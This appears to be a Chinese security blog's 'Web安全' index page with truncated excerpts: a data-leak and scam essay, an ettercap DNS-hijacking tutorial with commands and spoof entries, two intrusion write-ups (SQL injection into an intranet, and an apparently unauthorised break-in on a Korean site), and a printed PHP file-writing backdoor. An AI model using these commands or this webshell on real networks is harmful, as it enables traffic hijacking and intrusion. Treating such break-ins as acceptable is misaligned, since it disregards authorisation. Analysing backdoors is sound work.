分类 Web安全 下的文章

骗子聪明还是你蠢:数据泄露跟被骗有什么联系?

引子最近某邮箱泄露事件闹得沸沸扬扬,随后各种自媒体,各种论坛、QQ群都炸开了锅,各种文章也是层出不穷的,然而我看到的最多的即是有关于底下黑色产业链的解释,讲的很详细,从第一次泄露到被利用再到第二次泄露。可能很多人觉得自己远离网络的喧嚣黑产就和你没有半毛钱关系?那你就大错特错了,在当下这个混乱的互联网社会中,你根本身不由己,就是因为你生活在这个社会中,所以有奇怪的人打你电话,知道你的名字,你的工作单位,知道你的所有隐私,都不再奇怪。这难道不可怕吗?案例小黑是一个喜欢网络安全的大学生,在......


Ubuntu下ettercap进行DNS内网DNS劫持

0x01 安装ettercapctrl+alt+T打开命令行,输入:sudo apt-get install ettercap 0x02 修改配置文件sudo vim /etc/ettercap/etter.dns 在最后一行加入:*.com A 192.168.1.1 *.cn A 192.168.1.1 IP地址是要把IP解析到的IP0x03 开始DNS劫持ettercap -T -i wlan0 -q -P dns_spoof /// /// -T文本模式 -i接要欺骗的适配器......


和柠檬草叔叔的泪奔史:从注入到内网漫游

作者:王松_Striker && 柠檬草邮箱:song@secbox.cn团队:安全盒子团队前言注入点是jcms的一个注入点,然后进行注入获取密码以后,安全核心核心成员wefgod对密码进行了逆向(在此感谢wefgod大神),但是登陆后台提示密码错误,各种无解,最终发现注入点可以执行命令,自己鼓捣了很久无果,于是拉上草叔叔,就有了下文,非常精彩的一个过程。0x01撕开内网入口松叔叔给我发了一个sa权限的注入点。条件是:库站分离。ps:也是比较蛋疼的,sqlmap的回显比较慢,虽然可以......


抗韩之路:记渗透某韩国网站的过程

作者:王松_Striker邮箱:song@secbox.cn团队:安全盒子团队许久没有上(ri)过网(zhan)了,前几天朋友给我发来一个棒子站大概看了一下,基本环境是:PHP+MYSQL+Apache,大小写切换了一下,把最后的php换成phP,得知系统为Linux随便点了几个链接,发现必须登陆才能访问, 会提示无法访问然后跳到登陆页面, 简单测试了一下,发现登录框存在注入 得知表前缀为:g4_ 字段前缀是mb_ 注入了一会儿发现尼玛这条语句没有带入where mb_passwo......


分享一款遇到的PHP后门

这个后门是我在渗透某站时遇到的代码<?php $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST["z2"]; $buf = ""; for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2......


© 2019 Tuuu Nya's Blog . 由 Typecho 强力驱动 | Theme By Jimmy